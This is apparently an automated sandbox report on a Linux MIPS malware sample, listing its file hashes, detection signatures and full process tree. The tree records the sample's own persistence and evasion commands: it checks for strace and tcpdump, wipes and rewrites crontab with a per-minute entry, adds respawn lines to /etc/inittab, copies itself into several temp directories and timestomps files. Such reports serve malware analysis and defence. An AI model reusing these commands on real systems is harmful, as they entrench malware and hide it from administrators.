Analysis
-
max time kernel
0s -
max time network
121s -
platform
linux_mipsel -
resource
debian9-mipsel-en-20211208 -
submitted
14-03-2022 01:55
Static task
static1
Behavioral task
behavioral1
Sample
97717ad2ff60ac257a5f66634fe06544
Resource
debian9-mipsel-en-20211208
General
-
Target
97717ad2ff60ac257a5f66634fe06544
-
Size
156KB
-
MD5
97717ad2ff60ac257a5f66634fe06544
-
SHA1
9845039ea2423177944fb7666595002891ca28e3
-
SHA256
95d1fca8bea30d9629fdf05e6ba0fc6195eb0a86f99ea021b17cb8823db9d78b
-
SHA512
1535c1402cce5805feff0373ad74de39d5fd5012ff4c400a1e82074fa9967cdc50e58876ad9f9a2352fcb340e77735abd2f5f3f5fa5dcde254f6abd326577f6e
Malware Config
Signatures
-
Writes file to system bin folder 1 TTPs 3 IoCs
Processes:
description | ioc
/bin/crontab | /bin/crontab
/bin/nvram | /bin/nvram
/bin/uname | /bin/uname
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
Processes:
description | ioc
/etc/hosts | /etc/hosts
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
Processes:
description | ioc | process
/etc/rc.local | /etc/rc.local | 97717ad2ff60ac257a5f66634fe06544
-
Write file to user bin folder 1 TTPs 2 IoCs
Processes:
description | ioc
/usr/bin/crontab | /usr/bin/crontab
/usr/sbin/nvram | /usr/sbin/nvram
-
Reads runtime system information 20 IoCs
Reads data from /proc virtual filesystem.
Processes:
description | ioc | process
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | crontab
/proc/filesystems | /proc/filesystems | cp
/proc/filesystems | /proc/filesystems | crontab
-
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description | ioc | process
/tmp/97717ad2ff60ac257a5f66634fe06544 | /tmp/97717ad2ff60ac257a5f66634fe06544 | cp
/tmp/97717ad2ff60ac257a5f66634fe06544 | /tmp/97717ad2ff60ac257a5f66634fe06544 | cp
/tmp/.bawtz | /tmp/.bawtz | 97717ad2ff60ac257a5f66634fe06544
/tmp/97717ad2ff60ac257a5f66634fe06544 | /tmp/97717ad2ff60ac257a5f66634fe06544 | cp
/tmp/97717ad2ff60ac257a5f66634fe06544 | /tmp/97717ad2ff60ac257a5f66634fe06544 | cp
Processes
-
./97717ad2ff60ac257a5f66634fe06544 · ./97717ad2ff60ac257a5f66634fe06544 · 1⤵
- Modifies rc script
- Writes file to tmp directory
PID:325
-
/bin/sh · sh -c "pidof -x strace > /dev/null" · 1⤵ · PID:326
-
/bin/pidof · pidof -x strace · 2⤵ · PID:327
-
/bin/sh · sh -c "pidof -x tcpdump > /dev/null" · 1⤵ · PID:328
-
/bin/pidof · pidof -x tcpdump · 2⤵ · PID:330
-
/bin/sh · sh -c "cat /etc/inittab | grep -v \"/tmp/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2" · 1⤵ · PID:336
-
/bin/cat · cat /etc/inittab · 2⤵ · PID:339
-
/bin/grep · grep -v /tmp/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:342
-
/bin/sh · sh -c "crontab -r" · 1⤵ · PID:337
-
/usr/bin/crontab · crontab -r · 2⤵
- Reads runtime system information
PID:340
-
/bin/sh · sh -c "crontab -l | grep /tmp/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -" · 1⤵ · PID:338
-
/usr/bin/crontab · crontab -l · 2⤵
- Reads runtime system information
PID:341
-
/bin/grep · grep /tmp/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:343
-
/bin/grep · grep -v "no cron" · 2⤵ · PID:344
-
/usr/bin/crontab · crontab - · 2⤵
- Reads runtime system information
PID:347
-
/bin/sh · sh -c "echo \"0:2345:respawn:/tmp/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2" · 1⤵ · PID:345
-
/usr/bin/crontab · crontab -l · 1⤵
- Reads runtime system information
PID:348
-
/bin/sh · sh -c "cat /etc/inittab2 > /etc/inittab" · 1⤵ · PID:349
-
/bin/cat · cat /etc/inittab2 · 2⤵ · PID:350
-
/bin/sh · sh -c "rm -rf /etc/inittab2" · 1⤵ · PID:351
-
/bin/rm · rm -rf /etc/inittab2 · 2⤵ · PID:352
-
/bin/sh · sh -c "touch -acmr /bin/ls /etc/inittab" · 1⤵ · PID:353
-
/usr/bin/touch · touch -acmr /bin/ls /etc/inittab · 2⤵ · PID:354
-
/bin/sh · sh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /dev/shm/97717ad2ff60ac257a5f66634fe06544" · 1⤵ · PID:357
-
/bin/cp · cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /dev/shm/97717ad2ff60ac257a5f66634fe06544 · 2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:360
-
/bin/sh · sh -c "/bin/uname -n" · 1⤵ · PID:358
-
/bin/uname · /bin/uname -n · 2⤵ · PID:359
-
/bin/sh · sh -c "cat /etc/inittab | grep -v \"/dev/shm/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2" · 1⤵ · PID:362
-
/bin/cat · cat /etc/inittab · 2⤵ · PID:364
-
/bin/grep · grep -v /dev/shm/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:365
-
/bin/sh · sh -c "crontab -l | grep /dev/shm/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -" · 1⤵ · PID:363
-
/usr/bin/crontab · crontab -l · 2⤵
- Reads runtime system information
PID:366
-
/bin/grep · grep /dev/shm/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:367
-
/bin/grep · grep -v "no cron" · 2⤵ · PID:368
-
/usr/bin/crontab · crontab - · 2⤵
- Reads runtime system information
PID:371
-
/bin/sh · sh -c "echo \"0:2345:respawn:/dev/shm/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2" · 1⤵ · PID:369
-
/usr/bin/crontab · crontab -l · 1⤵
- Reads runtime system information
PID:372
-
/bin/sh · sh -c "cat /etc/inittab2 > /etc/inittab" · 1⤵ · PID:373
-
/bin/cat · cat /etc/inittab2 · 2⤵ · PID:374
-
/bin/sh · sh -c "rm -rf /etc/inittab2" · 1⤵ · PID:375
-
/bin/rm · rm -rf /etc/inittab2 · 2⤵ · PID:376
-
/bin/sh · sh -c "touch -acmr /bin/ls /etc/inittab" · 1⤵ · PID:377
-
/usr/bin/touch · touch -acmr /bin/ls /etc/inittab · 2⤵ · PID:378
-
/bin/sh · sh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/tmp/97717ad2ff60ac257a5f66634fe06544" · 1⤵ · PID:379
-
/bin/cp · cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/tmp/97717ad2ff60ac257a5f66634fe06544 · 2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:380
-
/bin/sh · sh -c "cat /etc/inittab | grep -v \"/var/tmp/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2" · 1⤵ · PID:382
-
/bin/grep · grep -v /var/tmp/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:386
-
/bin/cat · cat /etc/inittab · 2⤵ · PID:384
-
/bin/sh · sh -c "crontab -l | grep /var/tmp/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -" · 1⤵ · PID:383
-
/bin/grep · grep -v "no cron" · 2⤵ · PID:388
-
/usr/bin/crontab · crontab -l · 2⤵
- Reads runtime system information
PID:385
-
/bin/grep · grep /var/tmp/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:387
-
/usr/bin/crontab · crontab - · 2⤵
- Reads runtime system information
PID:391
-
/bin/sh · sh -c "echo \"0:2345:respawn:/var/tmp/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2" · 1⤵ · PID:389
-
/usr/bin/crontab · crontab -l · 1⤵
- Reads runtime system information
PID:392
-
/bin/sh · sh -c "cat /etc/inittab2 > /etc/inittab" · 1⤵ · PID:393
-
/bin/cat · cat /etc/inittab2 · 2⤵ · PID:394
-
/bin/sh · sh -c "rm -rf /etc/inittab2" · 1⤵ · PID:395
-
/bin/rm · rm -rf /etc/inittab2 · 2⤵ · PID:396
-
/bin/sh · sh -c "touch -acmr /bin/ls /etc/inittab" · 1⤵ · PID:397
-
/usr/bin/touch · touch -acmr /bin/ls /etc/inittab · 2⤵ · PID:398
-
/bin/sh · sh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/lock/97717ad2ff60ac257a5f66634fe06544" · 1⤵ · PID:399
-
/bin/cp · cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/lock/97717ad2ff60ac257a5f66634fe06544 · 2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:400
-
/bin/sh · sh -c "cat /etc/inittab | grep -v \"/var/lock/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2" · 1⤵ · PID:402
-
/bin/grep · grep -v /var/lock/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:406
-
/bin/cat · cat /etc/inittab · 2⤵ · PID:404
-
/bin/sh · sh -c "crontab -l | grep /var/lock/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -" · 1⤵ · PID:403
-
/bin/grep · grep -v "no cron" · 2⤵ · PID:408
-
/bin/grep · grep /var/lock/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:407
-
/usr/bin/crontab · crontab -l · 2⤵
- Reads runtime system information
PID:405
-
/usr/bin/crontab · crontab - · 2⤵
- Reads runtime system information
PID:411
-
/bin/sh · sh -c "echo \"0:2345:respawn:/var/lock/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2" · 1⤵ · PID:409
-
/usr/bin/crontab · crontab -l · 1⤵
- Reads runtime system information
PID:412
-
/bin/sh · sh -c "cat /etc/inittab2 > /etc/inittab" · 1⤵ · PID:413
-
/bin/cat · cat /etc/inittab2 · 2⤵ · PID:414
-
/bin/sh · sh -c "rm -rf /etc/inittab2" · 1⤵ · PID:415
-
/bin/rm · rm -rf /etc/inittab2 · 2⤵ · PID:416
-
/bin/sh · sh -c "touch -acmr /bin/ls /etc/inittab" · 1⤵ · PID:417
-
/usr/bin/touch · touch -acmr /bin/ls /etc/inittab · 2⤵ · PID:418
-
/bin/sh · sh -c "cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/run/97717ad2ff60ac257a5f66634fe06544" · 1⤵ · PID:419
-
/bin/cp · cp -f /tmp/97717ad2ff60ac257a5f66634fe06544 /var/run/97717ad2ff60ac257a5f66634fe06544 · 2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:420
-
/bin/sh · sh -c "cat /etc/inittab | grep -v \"/var/run/97717ad2ff60ac257a5f66634fe06544\" > /etc/inittab2" · 1⤵ · PID:422
-
/bin/cat · cat /etc/inittab · 2⤵ · PID:424
-
/bin/grep · grep -v /var/run/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:425
-
/bin/sh · sh -c "crontab -l | grep /var/run/97717ad2ff60ac257a5f66634fe06544 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/97717ad2ff60ac257a5f66634fe06544 > /dev/null 2>&1 &\") | crontab -" · 1⤵ · PID:423
-
/usr/bin/crontab · crontab -l · 2⤵
- Reads runtime system information
PID:426
-
/bin/grep · grep /var/run/97717ad2ff60ac257a5f66634fe06544 · 2⤵ · PID:427
-
/bin/grep · grep -v "no cron" · 2⤵ · PID:428
-
/usr/bin/crontab · crontab - · 2⤵
- Reads runtime system information
PID:432
-
/bin/sh · sh -c "echo \"0:2345:respawn:/var/run/97717ad2ff60ac257a5f66634fe06544\" >> /etc/inittab2" · 1⤵ · PID:429
-
/bin/sh · sh -c "cat /etc/inittab2 > /etc/inittab" · 1⤵ · PID:430
-
/bin/cat · cat /etc/inittab2 · 2⤵ · PID:434
-
/usr/bin/crontab · crontab -l · 1⤵
- Reads runtime system information
PID:433
-
/bin/sh · sh -c "rm -rf /etc/inittab2" · 1⤵ · PID:435
-
/bin/rm · rm -rf /etc/inittab2 · 2⤵ · PID:436
-
/bin/sh · sh -c "touch -acmr /bin/ls /etc/inittab" · 1⤵ · PID:437
-
/usr/bin/touch · touch -acmr /bin/ls /etc/inittab · 2⤵ · PID:438